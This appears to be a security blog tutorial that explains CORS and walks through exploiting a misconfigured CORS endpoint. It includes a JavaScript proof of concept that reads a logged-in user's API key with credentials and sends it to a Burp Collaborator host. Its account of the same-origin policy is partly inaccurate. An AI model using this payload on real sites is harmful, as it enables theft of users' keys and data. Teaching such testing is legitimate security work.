With a real-world example:

Image for post
Image for post

To understand CORS first we need to learn about same-origin.

When we browse any application that application server fetch data such as images, web pages from different locations on the same server or maybe from a different server on the internet. So to make this fetching securely server implements “same-origin policy”.

Same Origin Policy: If server set this then server can fetch data, only from the same server they have whitelisted in their same origin policy if they try to fetch data from a domain which is not whitelisted, their request will not be successful.

What do you mean by same-origin??

It is a combination of three parts.

· Port

· Protocol

· Host

So if A wants some data from B then A and B both must have the same port (80), host (example.com), and protocol (HTTP/https). When these three parts are the same, fetching can be successful in same-origin policy.

So, after implementing it we can achieve security but developer or application admin feels very restrictive to perform tasks on the web application. Because whitelisting each and every URL from you want to fetch the data is a hectic task for the developers. Therefore, to remove that restriction we can use CORS. By this, we can specify on which domain we can share or fetch the data.

Cross-Origin Resource Sharing (CORS): From outside of its own origin requesting any resources is known as CORS.

It provides relaxation of the same-origin policy which is specified on the server. To implement CORS we need to pass some headers on the webpage on which we want to fetch data from other resources.

Implementation of CORS depends on so many things such as its framework, language.

CORS headers

· Access-Control-Allow-Origin(ACAO): Inside it, we can specify which domains are listed to fetch the data, sometimes we saw ’*’, it means CORS implemented server will request data from any of the domain instead of some whitelisted one

· Access-Control-Allow-Methods: Here we specify which HTTP methods such as GET, POST, OPTIONS are used to access those resources. Sometimes server process the modified method to request that is not safe for server.

Advantage

· Resources over infrastructure can be shared easily.

· No need to create duplicate resource over the network because one host to another host some connections are certainly desired.

Dis-advantage

If it is set very loosely, any domain on which user visits can fetch the data of the parent domain.

Implement CORS in specials cases and configuration should be restrictive.

Working:

Image for post
Image for post

· Initial attacker set up his domain where he/she can capture legit user response and fetches some sensitive information from the website which is vulnerable to CORS

· Now user logs into the CORS vulnerable application.

· As soon as legit user visits the attacker controllable domain his sensitive data such as API keys, emails will be stolen.

· Using his domain information attacker fetch some sensitive data of the legit user.

Exploitation: The application is vulnerable to CORS and we have to fetch the API key of the user

So after logging into the application, intercepting the request, In the response, we saw “Access-Control-Allow-Credentials” set is true.

Image for post
Image for post

In the request, I have added “Origin” header in request with any random domain to check whether it is vulnerable to CORS or not. If that domain reflected in response it means CORS exists there.

Image for post
Image for post

And same domain that we entered in the request header reflected in the response header.

We will use the below PoC to exploit this vulnerability.

<script>

var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','<CORS vulnerable application link>',true);
req.withCredentials = true;
req.send();

function reqListener() {
location='<Give burp collaborator client address>/log?key='+this.responseText;
};

</script>

As we already knew CORS vulnerable endpoint, we have to paste that in place of <CORS vulnerable link > and we will use burp Collaborator URL from burp i.e. https://0efqlclec4hdtuqyvoc4odd80z6pue.burpcollaborator.net/

So after entering vulnerable URL and burp collaborator address Updated POC:

Image for post
Image for post

After decoding the body of the above request.

Image for post
Image for post

Now forward the request and check the burp collaborator client.

Image for post
Image for post

We can see that we have successfully fetch the APi_key of the admin.

Remediation

· Whitelisting of the domain for Access –control-Allow-Origin.

· Avoid setting ‘*’ in Access –control-Allow-Origin.

Written by

Security enthusiast working to secure web for others https://twitter.com/BoredSecEngg

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store